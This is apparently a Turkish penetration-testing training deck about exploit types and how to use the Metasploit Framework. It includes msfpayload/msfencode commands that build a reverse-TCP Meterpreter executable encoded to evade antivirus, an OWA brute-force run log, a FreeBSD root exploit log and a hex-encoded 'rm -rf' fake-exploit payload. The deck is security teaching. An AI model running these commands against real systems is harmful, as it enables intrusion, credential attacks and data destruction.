• Exploit nedir?
• Exploit çeşitleri
• Hangi	dille	yazılır	?
• Exploit araştırma	teknikleri
• Yazması	zor	mudur?
• Exploit Frameworkleri
@BGASecurity
BGA	|	MetasploitExploit	Nedir?
• Exploit (Ingilizce to exploit - kötüye	kullanmak)	bir	bilgisayar	programı	veya	bir	script,	bilgisayar	
programlarında	bulunan	zayıflık	veya	hatalar	için	kullanılır.
• Vikipedia
http://en.wikipedia.org/wiki/Exploit_(computer_security)
• Teknik	olarak	,	pentest çalışmalarında	ya	da	siber	saldırılarda	varolan bir	güvenlik	zafiyetini	istismar	
ederek	sisteme	sızmaya	yol	açacak	yazılım/script.
@BGASecurity
BGA	|	MetasploitExploit	Çeşitleri
• Farklı	amaçlarla	kullanılan	exploit çeşitleri	vardır
• Exploit çeşitlerinden	bazıları
• Local	Exploits
• Remote Exploits
• Dos-Exploits
• Command-Execution-Exploits
• SQL-Injection-Exploits
• Zero-Day-Exploits
@BGASecurity
BGA	|	MetasploitRemote Exploits
• Sistemlere	sadece	uzaktan	erişilerek	çalıştırılabilen	exploit çeşidi.
• Bu	exploit çeşidinde	hedef	sisteme	ağ	üzerinden	bağlantının	olması	yeterli	olmaktadır.
• Web	tabanlı	ya	da	network	tabanlı	olabilir.
@BGASecurity
BGA	|	MetasploitLocal Exploits
• Sadece	uzaktan	erişimin	yeterli	olmadığı,	hedef	sistem	üzerinde	yetkili/düşük	yetkili	sistem	hesabı	
gerektiren	exploit çeşidi.
• Linux	kernel exploitleri bu	exploit tipine	en	iyi	örnektir.
• İstismar	kodunu	çalıştırabilmek	için	Linux	sistem	üzerinde	komut	çalıştırabilmek	gerekir.
@BGASecurity
BGA	|	MetasploitDoS Exploits
• Çalıştırıldığında	hedef	sisteme	erişim	izni	vermeyen	fakat	hedef	sistemin	çalışamaz,	erişilemez	hale	
gelmesini	sağlayan	exploit çeşidi.
• Tehlike	seviyesi	diğerlerine	göre	daha	düşüktür.
@BGASecurity
BGA	|	MetasploitCommand Execution Exploits
• Daha	çok	web	uygulamaları	için	kullanılan	bir	kavram.
• Web	uygulamasındaki	bir	güvenlik	zafiyetini	işletim	sisteminde	komut	çalıştıracak	şekilde	istismar	etme.
• Web	uygulamalarının	sadece	web	/uygulama	katmanını	değil	tüm	sistemi	etkileyeceğinin	en	önemli	
örneklerindendir.
• Web	uygulamaları	harici	genel	uygulamalarda	da	görülebilir	fakat	günümüzde	bu	oran	istisna	denilecek	
kadar	azdır.
@BGASecurity
BGA	|	MetasploitUygulama|	Command Execution Exploit
• Hedef	sistem	DVWA
• Amaç:	Linux	ve	Windows	sistemlerde	kod	çalıştırma	açıklıklarının	istismar	edilmesiyle	işletim	sisteminin	
ele	geçirilebileceğinin	gösterilmesi.
• Windows	sistemlerle	Linux	sistemler	arasında	temel	bazı	farklar	bulunmaktadır
• Linux	sistemlerde	Apache sıradan	bir	kullanıcı	hakkıyla	çalışır
• Windows	sistemlerde	yetkili	kullanıcı	hakkıyla	çalışır
• İnternette	kod	çalıştırma	açığı	barındıran	siteler	“Google dorks”	yardımıyla	bulunabilir.
@BGASecurity
BGA	|	MetasploitSql Injection Exploits
• Sqli barındıran	sistemlere	yönelik	gerçekleştirilen	ve	amacı	hedef	sistemde	arka	kapı	oluşturmak,	hedef	
sistemden	bilgi	almak	olan	saldırı	tipi.
• Genellikle	sqlmap,	havij,pangolin gibi	araçlar	kullanılır.
• Başarılı	bir	saldırı	sonrası	SQLi üzerinden	hedef	sistem	ele	geçirilebilir.
@BGASecurity
BGA	|	MetasploitSQLi Uygulaması
• Hedef	sistem	DVWA
• Amaç	hedef	sistem	üzerinden	bilgi	alma,	hedef	sisteme	yetki	dahilinde	backdoor yerleştirme
• Kullanılan	araç	Sqlmap
• Sqli zafiyetleri	internet	üzerinden	Google yardımıyla	bulunabilir.
@BGASecurity
BGA	|	Metasploit0	day Exploit
• Açığı	bulan	kişi/grup	açıklığı	firmaya	bildirmeden	exploitini yazarak	yayınlar/satar.
• Exploiti firma	ile	saldırganlar	aynı	anda	haberdar	olur	ve	bir	yarış	başlar.
@BGASecurity
BGA	|	MetasploitExploit Araştırma	Kaynakları
• Exploitler iki	şekilde	elde	edilebilir:
• Google ve	benzeri	arama	motorları	kullanarak	genele	açık,	yayınlanmış	exploitler bulunabilir.
• Sadece	belirli	kişilerin	üye	olabileceği	underground	forumlarda,	IRC	odalarında	ve	dışa	kapalı	e-posta	listelerinde
• Değerli	exploitler genellikle	genele	açılmadan	önce	2-3	aylık	bir	satış	–özel	kullanım- süreci	yaşarlar.
• Exploit sat-al	işlemi	ciddi	paralar	kazandıran	bir	ticaret	biçimidir.
@BGASecurity
BGA	|	Metasploitexploit-db.com
• En	güncel	ve	güvenilir	exploit araştırma	sitesi
• Açıklığı	barındıran	uygulamanın	güncel	olmayan	sürümüne	erişim	bilgisi	de	sunar.
• Web	tabanlı	açıklıklar	içn Google üzerinde	arama	imkanı	sunar.
• Gönderilen	exploitler bir	kalite	kontrol	sürecinden	geçer,	fake exploitleri kabul	etmezler
@BGASecurity
BGA	|	MetasploitSecurityFocus
@BGASecurity
BGA	|	Metasploitpacketstormsecurity.com
@BGASecurity
BGA	|	MetasploitGoogle	?
• Bazı	exploitler exploit-db ve	securityfocus’da olmayabilir
• Bu	tip	exploit aramalarında	en	sağlıklı	yollardan	biri	Google’a sormaktır
• Bind DOS	açıklığı	exploiti araştırması
• Internetten indirilecek	her	exploit güvenilir	midir?
• Örnek:
@BGASecurity
BGA	|	MetasploitSahte	Exploit Kavramı
• Ava	giderken	avlanma!
• Exploit vs	gibi	konularda	yeterli	bilgi	sahibi	olmayan	meraklı	“hacker”ları kandırmak	ve	sistemlerini	ele	
geçirmek	amacıyla	–genellikle	eğlence	amaçlı- gerçekleştirilir.
• Exploit kodu	(payload kısmı)	genellikle	hex encode edilerek	verilir.
• Exploit çalıştırıldığında	çalıştığı	sistemi	silebilir,	başka	sistemlere	bilgi	taşıyabilir.
@BGASecurity
BGA	|	MetasploitSahte	Exploit Örneği-I
@BGASecurity
BGA	|	MetasploitSahte	Exploit Örneği-II
char jmpcode[]	=
"x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2f"
"x64x65x76x2fx6ex75x6cx6cx20x26";
?????r?m?	?-?r?f?	?~?	?/?*?	?2?>?	
?/??????d?e?v?/?n?u?l?l?	?&?
"rm -rf ~ /* 2> /dev/null &"
@BGASecurity
BGA	|	MetasploitExploit	Çalıştırma
• Script tabanlı	exploitler
• Python,	Perl ile	yazılmış	exploitler
• C/C++	dilleri	ile	yazılmış	exploitlerin çalıştırılması
• Her	exploitin çalıştırılmaıs için	gerekli	komut	satırı	parametreleri	farklıdır.
• Her	sistem,	her	sistemde	yüklü	olan	yama	seviyesine	göre	farklı	exploit çalıştırmak	gerekebilir.
• Script tabanlı	exploitlerin payloadları genellikle	iki	tane	olur	(bind TCP,	reverse TCP)
@BGASecurity
BGA	|	MetasploitExploit Geliştirme/Çalıştırma
• Exploit geliştirme	ve	çalıştırma	birbirinden	farklı	işlemlerdir
• Exploit geliştirme	ve	güvenlik	zafiyet	bulma	birbirinden	farklı	uzmanlık	isteyen	konulardır.
• Exploit geliştirme	günümüzde	işletim	sistemlerinin	getirdiği	ek	korumalar	(geliştirme	kütüphanelerinin	
de)	sayesinde	oldukça	zor	bir	hale	getirilmiştir.
• Exploit çalıştırma	en	basit	işlemdir.
• Oku,	izle,	kur	çalıştır!
@BGASecurity
BGA	|	MetasploitExploit Çalıştırmanın	Zararları
• Bazı	exploit denemeleri	hedef	sistemin	durmasına,	servisin	zedelenmesine	veya	crash o	lmasına neden	olabilir.
• Pentest çalışmalarında	önce	exploit lab.	Ortamında	denenmeli
@BGASecurity
BGA	|	MetasploitC	Tabanlı	Exploitlerin Çalıştırılması
@BGASecurity
BGA	|	MetasploitOtomatize	Exploit	Çalıştırma
• Neden	ihtiyaç	duyuldu?
• Binlerce	exploit var
• Her	exploit belirli	bir	sisteme(işletim	sistemi,	yazılım	versiyonu)	özel	yazılıyor.
• Kurulum	dili	bile	farklı	olsa	exploit çalışmayabilir
• Tüm	bunları	aşmak	için	bir	framework gerekir
@BGASecurity
BGA	|	MetasploitOtomatik	Exploit Çalıştırma	Eksileri
• Hangi	durumlarda	otomatik	exploit çalıştırma	araçları	avantajlı/dezavantajlı	olur?
• Özellikle	local exploitlerde (Linux	kernelini ilgilendiren)	metasploit için	geliştirilmiş	exploit yoktur.
• Bu	durumda	internet	üzerinden	araştırma	yapılarak	bulunabilir.
• Exploitin indirileceği	site	herhangi	bir	site	olmamalıdır	(sahte	exploitlere önlem	olarak)
@BGASecurity
BGA	|	MetasploitJboss Jmx-console Örneği
• Metasploit Jboss exploitleri stabil	değildir.
• 4	uyuglamadan 3’ü	sağlıklı	çalışmamaktadır.
@BGASecurity
BGA	|	MetasploitJboss Metasploit’siz Exploit Denemesi
http://www.exploit-db.com/exploits/16274/
@BGASecurity
BGA	|	MetasploitLinux	Local Root Exploiti Arama
• Linux	kernel versiyonu	belirleme
• Uname –a
http://rmccurdy.com/scripts/downloaded/localroot/
#	uname -a
FreeBSD	s-guard19	8.1-RELEASE	FreeBSD	8.1-
RELEASE	#0:	Tue	Dec	21	08:21:08	CST	2010					
root@server3:/usr/obj/usr/src/sys/server3		
amd64$	uname -a
Linux	bt5r2	3.2.6	#1	SMP	Fri Feb 17	10:40:05	
EST	2012	i686	GNU/Linux
@BGASecurity
BGA	|	MetasploitUygulama|FreeBSD Local Root Exploit
%uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE	FreeBSD 8.0-RELEASE	#0:	Sat	Nov 21
15:48:17	UTC	2009
uid=1001(kcope)	gid=1001(users)	groups=1001(users)
%./w00t.sh
FreeBSD local r00t	zeroday
by Kingcope
November 2009
env.c:	In function 'main':
env.c:5:	warning:	incompatible implicit declaration of	built-in
function 'malloc'
env.c:9:	warning:	incompatible implicit declaration of	built-in
function 'strcpy'
env.c:11:	warning:	incompatible implicit declaration of	built-in
function 'execl‘
ALEX-ALEX
#	uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE	FreeBSD 8.0-RELEASE	#0:	Sat	Nov 21
15:48:17	UTC	2009
root ()	almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC	i386
uid=1001(kcope)	gid=1001(users)	euid=0(root)	groups=1001(users)
@BGASecurity
BGA	|	MetasploitOtomatize	Exploit	Araçları
• Core Impact
• Immunity Canvas
• ExploitPack
• Metasploit Framework
• W3af
• Sqlmap (Metasploit desteğiyle)
@BGASecurity
BGA	|	MetasploitCore	Impact
@BGASecurity
BGA	|	MetasploitImmunity Canvas
@BGASecurity
BGA	|	MetasploitExploitpack
@BGASecurity
BGA	|	MetasploitMetasploit
@BGASecurity
BGA	|	MetasploitMetasploit Framework Projesi
• Metasploit Framework projesi	exploit teknikleri		ile
istismarları	hakkında	bilgi	sağlamakta.
• Oluşturduğu	yapı	ile	güvenlik	denetçilerine,	IDS	imza	geliştirme	ve	istismar	araştırmaları	yapan	
uzmanlara,	hackerlara faydalı	bilgiler	vermekte	ve		exploit geliştiricileri	için	bir	çatı	oluşturmaktadır.	
• Metasploit bir	toplum	projesi	Metasploit LLC	tarafından
yönetilmekteydi.	
• Rapid7	firmasına	satıldıkdan sonra	Pro ve	Community sürümleri	ile	devam	etmektedir.
@BGASecurity
BGA	|	MetasploitMetasploit	Tarihçesi
• İlk	olarak	ağ	güvenliği	oyunu	amaçlı	geliştirilmiştir
• Sonraları	perl tabanlı	bir	exploit geliştirme	çatısı	olarak	kullanıma	sunuldu
• Haziran	2004	:	2.1	stable sürümü	yayınlandı
• Mart	2007	3.0	stable sürümü	yayınlandı
• Eski	sürümlerde	perl temel	alınırken	yeni	sürümlerde	tamamen	Ruby’e geçilmiş	durumda
@BGASecurity
BGA	|	MetasploitMetasploit Framework |	Özellikleri
Özellikleri	;
• Community ve	Pro sürümleri	bulunmakta.	
• 800	exploits	- 435	auxiliary - 134	post -246	payloads – 27 encoders - 8	nop bulunuyor
• Çok	farkli türde	payload’lar kullanilabiliyor
• Meterpreter
• VNC	DLL	Injection
• Binary Upload
• PassiveX
• Çok	sayida	farkli	encoder	kullanilabiliyor;	alpha2,	Pex,	Shikata	Ga	Nai,	Sparc,	Countdown,
JpmCallAdditive,	PexFnstenvSub
• Konsol	(msfconsole),	program	arayüzü(msfgui)	ve	web	arabirimi	(msfpro)	bulunuyor.
• Farklı	işletim	sistemlerinde	(Linux,	Windows,Mac	OS	X)	çalışabiliyor.
@BGASecurity
BGA	|	MetasploitMetasploit Framework |	Kurulum
• Metasploit Framework	(MSF),	Windows	işletim	sistemleri	de	dahil	olmak	üzere,	geniş	bir	yelpazede	çalışır.
• Windows	2000/XP/2003,	Linux,	OpenBSD,	FreeBSD ve	Mac	OS	X	işletim	sistemlerini	destekler.
Windows	İşletim	Sistemlerine	Kurulumu	Metasploit	Framework	ün	kurulumu	son	derece	basittir.4	adımda	
kurulumunu	gerçekleştirebilirsiniz.
http://www.metasploit.com/framework/download/		 adresinden	en	son	sürümünü	bilgisayarınıza	
indirerek	kurulumu	başlatabilirsiniz.
Next	>	Next	>	Next	>	Next	>	Next	>	Finish
NOT:	Nmap	ve	Winpcap	programları,	Metasploit	ile	birlikte
gelmektedir.Sisteminizde	mevcut	değilse	kurmanız	önerilir.
@BGASecurity
BGA	|	MetasploitMetasploit Framework |	Kurulum
Linux	için	kurulum	
Metasploit Framework ün	Linux	tabanlı	işletim	sistemlerine
kurulumu	farklılık	göstermektedir.
Metasploit Framework’ün Ubuntu/Kubuntu Linux	için	Kurulumu:
https://community.rapid7.com/docs/DOC-1296
Metasploit Framework’ün Android için	Kurulumu:
https://community.rapid7.com/docs/DOC-1039
Metasploit Framework’ün Iphone için	Kurulumu:
http://dev.metasploit.com/redmine/projects/framework/wiki/Install_iPhone
Mac	OS	X	için	Kurulum
https://community.rapid7.com/docs/DOC-1037
@BGASecurity
BGA	|	MetasploitMetasploit Framework |	Güncelleme
• Metasploit hızla	gelişen	bir	araçtır.
• Hergün,	her	saat	yeni	güvenlik	açıkları	keşfedilmekte	ve	bunları	sömüren	kodlar	yazılmaktadır.	
• Yeni	payload ,encoder,	exploit,	ve	NOP	hazırlandığında	metasploiti update ederek	
kullanabilirsiniz.
@BGASecurity
BGA	|	MetasploitMetasploit Framework |	Güncelleme
Linux	sistemlerde	komut	satırından	“msfupdate”	komutu	çalıştırılarak	güncelleme	yapılır.
@BGASecurity
BGA	|	MetasploitPayload Nedir	?
• Exploit sonrasi çalisip yetkisiz	islevi gerçeklestirecek içerik.
• Lambadan	çıkan	cinin	sahibine	sorduğu	soru.
@BGASecurity
BGA	|	MetasploitÜst	Düzey	Bazı	Payloadlar
Metasploit	Frameworkde	kullanılan	üst	düzey	farklı	işlevselliğe	sahip	payloadlar	bulunmaktadır.
Bunlardan	bazıları	;
• Meterpreter
• DLL	Injection
• Binary Upload
• PassiveX
• Download and Exec
• Adduser
@BGASecurity
BGA	|	MetasploitShellcode Nedir	?
• Exploit sonrasi çalisicak olan	platforma	özel	binary’ler.	
• Metasploit’de bulunan	payload’ların farklı	dillerde	shellcode çıktısı	alınabilir.
@BGASecurity
BGA	|	MetasploitEncoder Nedir	?
• Metasploit	Encoder,	istenilen	payloadın	içeriğini	değiştirerek	Saldırı		Tespit	ve	Engelleme	Sistemleri	(IDS/IPS),		
Güvenlik	Duvarları	(Firewall)	ve	Antivirüsler	tarafından	tanınmasını	engeller/zorlaştırır.
• Metasploit Frameworkde 27+	encoder bulunuyor.
@BGASecurity
BGA	|	MetasploitMetasploit Encoder Çeşitleri
Msfencode Kullanım	Parametreleri
@BGASecurity
BGA	|	MetasploitMetasploit Encoder Çeşitleri-II
Encoder Listesi
@BGASecurity
BGA	|	MetasploitMetasploit Encoder Kullanımı
Encoder Kullanımı
Shellcode’u msfpayload ile	raw formatında	msfencode a
aktarıp	içeriği	encode edebilirsiniz.
#	msfpayload windows/meterpreter/reverse_tcp
LHOST=6.6.6.112	LPORT=4443	R	|	msfencode –e
x86/shikata_ga_nai -t	exe –o	/var/www/payload.exe
@BGASecurity
BGA	|	MetasploitMetasploit Multi Encoder Kullanımı
• Multi-Encoder Kullanımı
Payload içeriği	bir	çok	encoder ile	değiştirilerek	yeniden
oluşturulabilir.
#	msfpayload windows/meterpreter/reverse_tcp LHOST=6.6.6.112	LPORT=4443	R	|
msfencode –e	x86/shikata_ga_nai -c	5	-t	raw |	msfencode -e	x86/alpha_upper -c	2	
t	raw |	msfencode -e	x86/shikata_ga_nai -c	5	-t	raw |	msfencode -e	x86/countdown
-c	5	-t	exe -o	/var/www/payload2.exe
[*]	x86/shikata_ga_nai succeeded with size	317	(iteration=1)
[*]	x86/shikata_ga_nai succeeded with size	344	(iteration=2)
[*]	x86/shikata_ga_nai succeeded with size	371	(iteration=3)
[*]	x86/shikata_ga_nai succeeded with size	398	(iteration=4)
….
@BGASecurity
BGA	|	MetasploitNop Nedir	?
“Not	Operation”	,	bellek	yeri	öğrenme	amaçlı	bellek	dolduran	bitler.	Genellikle	saldırı	tespit	ve	engelleme	
sistemlerini	yanıltmak	için	kullanılır.
@BGASecurity
BGA	|	MetasploitMetasploit NOP	Çeşitleri
İsim Açıklama
------- ---------------
ppc/simple Simple
sparc/random SPARC		NOP	generator
x86/opty2 Opty2
x86/single_byte Single	Byte
@BGASecurity
BGA	|	MetasploitAuxiliary Nedir?
• Modüller	için	geliştirilmiş	ek	programcıklar,	yardımcı	araçlardır.
• Exploit öncesi	bilgi	toplamak,	exploit sonrası	hedef	sistemde	ilerlemek	için	kullanılır.
• Metasploit’de en	fazla	kullanılan	bileşenlerden	biri	Aux modülleridir.
@BGASecurity
BGA	|	MetasploitMetasploit AUX	Modülleri
Auxiliary	İsmi Açıklama
----------------- -----------
dos/windows/smb/ms06_035_mailslot Microsoft	SRV.SYS	Mailslot	Write	
dos/windows/smb/rras_vls_null_deref Microsoft	RRAS	Interface	AdjustVLSPointers	NULL Dereference
recon_passive Simple	Recon	Module	Tester
scanner/discovery/sweep_udp	 UDP	Service	Sweeper
scanner/mssql/mssql_login	 MSSQL	Login	Utility
scanner/mssql/mssql_ping	 MSSQL	Ping	Utility
scanner/scanner_batch Simple	Recon	Module	Tester
scanner/scanner_host Simple	Recon	Module	Tester
scanner/scanner_range Simple	Recon	Module	Tester
scanner/smb/version SMB	Version	Detection
testSimple	Auxiliary	 Module	Tester
@BGASecurity
BGA	|	MetasploitMetasploit Araçlarını	Anlamak
Metasploit ,	birden	fazla	araç	ile	arayüz kullanımı	sağlar.Bu
araçlar	farklı	şartlar	ve	durumlarda	yüksek	derecede
esneklik	sağlar	;
• Tek	bir	kullanıcı,	tek	bir	hedef	sömürme
• Bir	kullanıcının	bir	oturum	sırasında	birden	çok	hedefi,
• Toplu	iş	modunda yönetebilmesi
• Aynı	anda	birden	fazla	oturum	açma
• Payload oturumlarını	askıya	alma	ve	yenileme
• Başka	kullanıcılar	ile	Payload oturumlarını	paylaşma
• Güvenlik	denetimi	yapan	grubun	aynı	ağda	veya	farklı	ağlarda	iş	birliği
@BGASecurity
BGA	|	MetasploitMsfgui
• Metasploit 3.x	ile	birlikte	gelen	arayüzdür.Msfgui ile	birlikte	exploitler ,	payloadlar,	auxiliaryler
kullanılabilir.
• Msfgui başlatmak	için	Windows	sistemlerde	Programs |	Metasploit 3	|	Metasploit 3	GUI bağlantısı	
izlenerek	erişim	kurulabilir.
• Unix	türevi	sistemlerde	msfgui’ye erişim	için	metasploit framework’un kurulu	olduğu	dizine	gidilerek	
“msfgui”	komutu	ile	metasploit arayüzü başlatılabilir	ve	“-h”	parametresi	ile	seçenekler	listelenebilir.
@BGASecurity
BGA	|	MetasploitMSFGUI	|	Console
@BGASecurity
BGA	|	MetasploitMSFGUI	|	Arama
Expoit,	Payload	
ve	Auxiliary	
araması
@BGASecurity
BGA	|	MetasploitMSFGUI	|	Exploit Seçimi
“exploits”	menüsünden	
kategorilenmiş	exploitler	
görüntülenir	ve	kullanılır.
@BGASecurity
BGA	|	MetasploitMSFGUI	|	Exploit Çalıştırma
1.	Adım:	
Hedef	ve	
Payload	
Seçimi
2.	Adım:
Exploit	ve	
Payload	için	
gerekli	ayarlar
3.	Adım:
Gelişmiş	
ayarlar	ve	
“exploit”
@BGASecurity
BGA	|	MetasploitMSFGUI	|	Exploit Çalıştırma
@BGASecurity
BGA	|	MetasploitMsfconsole
• Metasploit komut	satırı	aracıdır.	Unix	sistemlerde	metasploit	dizinine	geçilerek	“msfconsole”	komutu	yazılarak	başlatılır.
• Windows	sistemlerde	ise	web	arayüzünden
“Console” seçilerek	erişim	kurulur.
• Msfconsole ile	payloadlar,	exploitler,	encoderlar,	NOP	lar ve	auxiliary modulleri kullanılabilir.
• Metasploit komut	satırı	(msfconsole)	açılışında	metasploit logosu	gelir.
@BGASecurity
BGA	|	MetasploitMsfconsole
msfconsole dan	bir	görünüm
@BGASecurity
BGA	|	MetasploitMsfconsole
msfconsole dan	bir	görünüm
msfconsole,	farklı	türlerde	eğlenceli	bannerlara	sahiptir.”banner”	komutu	ile	diğer	bannerler görüntülenebilir
@BGASecurity
BGA	|	MetasploitMsfconsole
Yardım	seçeneklerinin	görüntülenmesi	(help)
• Bu	temel	komutların	açıklamalarına	bir	göz	atalım.
• En	çok	kullanılan	temel	komutlar,	ilerleyen	konularda	uygulamalı	olarak	yer	almaktadır.
@BGASecurity
BGA	|	MetasploitMsfconsole |	Temel	Komutlar
Temel	Komutlar
==============
Komut	 Açıklama
------- --------------
? Yardım	menüsü
Back Mevcut	seçenekten	bir	adım	geriye	döner
banner Metasploit	açılış	bannerlarını	gösterir
Cd Dizin	atlamak	için	kullanılır
color Renk	seçeneklerini	ayarlar
connect Uzak	bir	sunucuya	bağlantı	kurar
exit Konsoldan	çıkışı	sağlar
Help	 Yardım	menüsü
info Bir	veya	daha	fazla	modul	hakkında	bilgi	verir
irb İrb	scripting	modunu	getirir
Jobs Yapılan	işleri	gösterir	ve	düzenler
kill Çalışan	bir	görevi	öldürür.
Load Framework	için	eklenti	yükler
Loadpath Belirtilen	yoldan	istenilen	modulu/exploiti	yükler
makerc	 Başlangıçtan	itibaren	kullanılan	komutları	bir	dosyaya	yazar
quit Konsoldan	çıkışı	sağlar
route Oturumun	trafik	rotasını	belirler
Save Etkin	veriyi	kayıteder,		depolar
Set Ayarların	konfigure	edilmesinde	kullanılan	atama	komutu
setg Genel	bir	değer,	değişken	atar
show Belirtilen	modülü	veya	tüm	modülleri	listeler
Sleep Verilen	zaman	içinde	uyku	moduna	geç,	birşey	yapma
Unload Framework	için	mevcut	eklentiyi	kaldırır
unset Atanan	değeri	kaldırır
unsetg Yapılan	genel	bir	değeri,	değişkeni	kaldırır
use Modülü	seçer
Version Konsol	uygulamasının	versiyonunu	gösterir
search Modül	ismi	veya	açıklamalarda	arama	yapar
sessions Aktif	oturumları	gösterir	ve	oturum	bilgisi	verir
@BGASecurity
BGA	|	MetasploitBilgi	Toplama	Amaçlı	Aux Modülleri
Örnek	Aux modülleri
• use	auxiliary/scanner/ftp/ftp_login
• use	auxiliary/scanner/http/brute_dirs
• use	auxiliary/scanner/http/dir_scanner
• use	auxiliary/scanner/http/jboss_vulnscan
• use	auxiliary/scanner/http/open_proxy
• use	auxiliary/scanner/http/tomcat_enum
@BGASecurity
BGA	|	MetasploitMsfconsole |	Auxiliary |	Port Scanning
Port	tarama	için	arka	planda	nmap	kullanır.	
Port	tarama	araçlarını	görüntülemek	için	portscan	araması	yapılabilir.
@BGASecurity
BGA	|	MetasploitMsfconsole |	Auxiliary |	TCP	Scan
@BGASecurity
BGA	|	MetasploitMsfconsole |	Auxiliary |	Brute Force
Metasploit,	exploit	öncesi	ve	sonrası	parola	deneme	saldırıları	için	bir	çok	protokolü	ve	uygulamayı	
destekleyen	yardımcı	araçlar	barındırmaktadır.
@BGASecurity
BGA	|	MetasploitMsfconsole |	Auxiliary |	OWA	Brute Force
msf > search owa
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/owa_login normal Outlook Web App (OWA) Brute
Force Utility
@BGASecurity
BGA	|	MetasploitMsfconsole |	Auxiliary |	OWA	Brute Force
msf auxiliary(owa_login) > set USERPASS_FILE /root/owa_test
USERPASS_FILE => /root/owa_test
msf auxiliary(owa_login) > set RPORT 443
RPORT => 443
msf auxiliary(owa_login) > set VHOST mail.HEDEF_SITE.com.tr
VHOST => mail.HEDEF_SITE.com.tr
msf auxiliary(owa_login) > run
[*] mail.HEDEF_SITE.com.tr:0 OWA – Testing version 2010
[*] mail.HEDEF_SITE.com.tr:443 OWA – Testing version 2010
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘ali’ : ‘ali’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying sam : sam
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘sam’ : ‘sam’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying user : user
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE : grt
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’: ‘grt’
[*] Auxiliary module execution completed
@BGASecurity
BGA	|	MetasploitMsfconsole |	Auxiliary |	Wordpress
@BGASecurity
BGA	|	MetasploitMsfconsole |	Auxiliary |	SSH	Brute Force
@BGASecurity
BGA	|	MetasploitMsfconsole |	Auxiliary |MSSQL	Brute Force
@BGASecurity
BGA	|	MetasploitMsfconsole |	Auxiliary |	MSSQL	Enumeration
@BGASecurity
BGA	|	MetasploitMsfconsole |	Auxiliary |	DNS	Enum ve	Zone Transfer
ns2 için	zone	transferi	
başarısız,
fakat	ns1 için	zone	
transferi	başarılı
@BGASecurity
BGA	|	MetasploitMsfconsole |	Auxiliary |	SMB	Version Belirleme
• SMB	Version Detection modülü,	işletim	sistemi	hakkında	bilgi	sağlar. 445.	 porttan	çalışan	smb	servisinden	hedef	işletim	sisteminin	
versiyon	bilgisini	alır.
• Bu	bilgi,	hedef	sisteme	saldırı	öncesi	exploit	ve	payload	seçiminde	faydalı	olacaktır.
• Hedefte	bir	Linux	çalışıyorsa,	Samba	versiyonunu	tespit	edecektir.
@BGASecurity
BGA	|	MetasploitMetasploit Aux DoS Modülleri
• Metasploit kullanarak	DoS saldırısı	gerçekleştirme/deneme	çalışmaları
• Örnek	Aux modülleri
• use auxiliary/dos/tcp/synflood
• use auxiliary/dos/wifi/ssidlist_beacon
• use auxiliary/dos/wifi/fakeap
@BGASecurity
BGA	|	MetasploitMsfconsole |	Exploiting
Exploit Kullanımı
Bu	bölüm;		temel	komutlarla	exploit	seçimi,	seçeneklerin	yapılandırılmasını	ve	çalıştırmayı	içermektedir.
@BGASecurity
BGA	|	MetasploitExploit Arama
Arama	kriterleri
@BGASecurity
BGA	|	MetasploitMsfconsole |	Exploit Arama
• Örnek	arama	kriterleri	;
- Name
Açıklayıcı	bir	ada	göre	arama	yapmak	için	“name”	anahtar	sözcüğünü
kullanılır.
msf >		search name:codesys
@BGASecurity
BGA	|	MetasploitMsfconsole |	Exploit Arama
• Örnek	arama	kriterleri	;
- Path
“path“	anahtarı	kullanarak,	bir	dizin	altında	arama	yapılabilir
msf >		search path:scada
@BGASecurity
BGA	|	MetasploitMsfconsole |	Exploit Arama
• Örnek	arama	kriterleri	;
- Platform
Belli	bir	platforma	özgü	arama	yapmak	için	“platform”	anahtarı	kullanılabilir.
msf >		search platform:linux
@BGASecurity
BGA	|	MetasploitMsfconsole |	Exploit Arama
• Örnek	arama	kriterleri	;
- Type
Modül	türüne	göre,	örneğin	exploits,	payloads,	auxiliarys vb.	arama	yapmak	için	kullanılır.
msf >		search type:post
@BGASecurity
BGA	|	MetasploitMsfconsole |	Exploit Arama
• Örnek	arama	kriterleri	;
- Author
Yayımlacıyı kriterine	göre	arama	yapmayı	sağlar.
msf >		search author:celil
@BGASecurity
BGA	|	MetasploitMsfconsole |	Exploit Arama
• Örnek	arama	kriterleri	;
- Multiple
Birden	fazla	kritere	göre	arama	yapabilirsiniz,	bu	sayede	arama
sonucu	daraltmış	olursunuz.
msf >		search cve:2011	author:jduck platform:linux
@BGASecurity
BGA	|	MetasploitMsfconsole |	Exploit Hakkında	Bilgi
Exploit Hakkında	Bilgi	Almak
Exploit	seçiminden	önce,	exploit	hakkında	detaylı	bilgi	almak	için	“info”	komutu	kullanılabilir.	
En	temel	kullanımı	“info	exploit_adı”	şeklindedir.
@BGASecurity
BGA	|	MetasploitMsfconsole |	Exploit Seçimi
• Exploit Seçimi
Herhangi	bir	arama	kriterleri	yoksa,	kullanılabilir	exploit’lerin	tamamını	görüntülemek	için	“show	
exploits”	komutu	kullanılabilir.
• Exploit seçimi,	“use”	komutu	ile	yapılmaktadır.
msf >	use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi)	>
@BGASecurity
BGA	|	MetasploitMsfconsole |	Exploit Seçimi
Exploit	seçimi	yapıldıkdan	sonra,	exploit	için	işlem	menüsü	ile	karşılacaksınız.Exploit	komutlarını	listelemek	
için	yardım	komutunu	(help)	kullanabiliriz.	Exploit Komutları	ve	açıklamaları	aşağıdaki	gibidir;
Komut											 Açıklama
---------- -----------
Check Exploit öncesi	güvenlik	açığının	kontrolü	yapar.
exploit Exploiti tetikler.
pry Seçili	modül	için	pry oturumu	başlatır.
rcheck Hedef	sistemin	zayıflığını	tekrar	kontrol	eder
reload Yalnızca	module yükler
rexploit Exploiti tekrar	çalıştırır.
@BGASecurity
BGA	|	MetasploitMsfconsole |	Payload Seçimi
Payload Seçimi
